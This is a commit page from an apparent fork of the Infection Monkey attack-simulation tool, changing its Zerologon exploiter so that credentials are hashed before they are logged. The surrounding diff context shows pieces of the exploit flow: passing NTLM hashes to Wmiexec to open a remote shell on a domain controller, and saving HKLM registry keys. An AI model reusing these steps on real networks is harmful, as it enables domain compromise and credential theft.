p34709852
/
monkey
forked from p15670423/monkey
1
0
Fork 1
Code Issues Pull Requests Projects Releases Wiki Activity

Encrypt credentials before logging

This commit is contained in:
Shreya 2021-02-24 16:08:36 +05:30
parent 353e9844dc
commit 28edf7d2b7
1 changed files with 10 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
monkey/infection_monkey/exploit/zerologon.py
View File

@ -163,13 +163,13 @@ class ZerologonExploiter(HostExploiter):
] ]
try: try:
original_pwd_nthash = self.get_original_pwd_nthash( original_pwd_nthash = self.get_original_pwd_nthash(
username, ":".join(user_pwd_hashes) username, user_pwd_hashes
) )
if original_pwd_nthash: if original_pwd_nthash:
break break
except Exception as e: except Exception as e:
LOG.info( LOG.info(
f'Credentials "{user_details}" didn\'t work. Exception: {str(e)}' f"Credentials didn\'t work. Exception: {str(e)}"
) )
if not original_pwd_nthash: if not original_pwd_nthash:
@ -304,7 +304,7 @@ class ZerologonExploiter(HostExploiter):
if nthash not in self._config.exploit_ntlm_hash_list: if nthash not in self._config.exploit_ntlm_hash_list:
self._config.exploit_ntlm_hash_list.append(nthash) self._config.exploit_ntlm_hash_list.append(nthash)
def get_original_pwd_nthash(self, username: str, user_pwd_hashes: str) -> str: def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> str:
if not self.save_HKLM_keys_locally(username, user_pwd_hashes): if not self.save_HKLM_keys_locally(username, user_pwd_hashes):
return return
@ -335,13 +335,16 @@ class ZerologonExploiter(HostExploiter):
finally: finally:
self.remove_locally_saved_HKLM_keys() self.remove_locally_saved_HKLM_keys()
def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: str) -> bool: def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool:
LOG.debug( LOG.info(
f'Starting remote shell on victim with user: "{username}" and hashes: "{user_pwd_hashes}". ' f'Starting remote shell on victim with credentials:\n'
f'user: {username}\n'
f'hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : '
f'{self._config.hash_sensitive_data(user_pwd_hashes[1])}'
) )
wmiexec = Wmiexec( wmiexec = Wmiexec(
ip=self.dc_ip, username=username, hashes=user_pwd_hashes, domain=self.dc_ip ip=self.dc_ip, username=username, hashes=':'.join(user_pwd_hashes), domain=self.dc_ip
) )
remote_shell = wmiexec.get_remote_shell() remote_shell = wmiexec.get_remote_shell()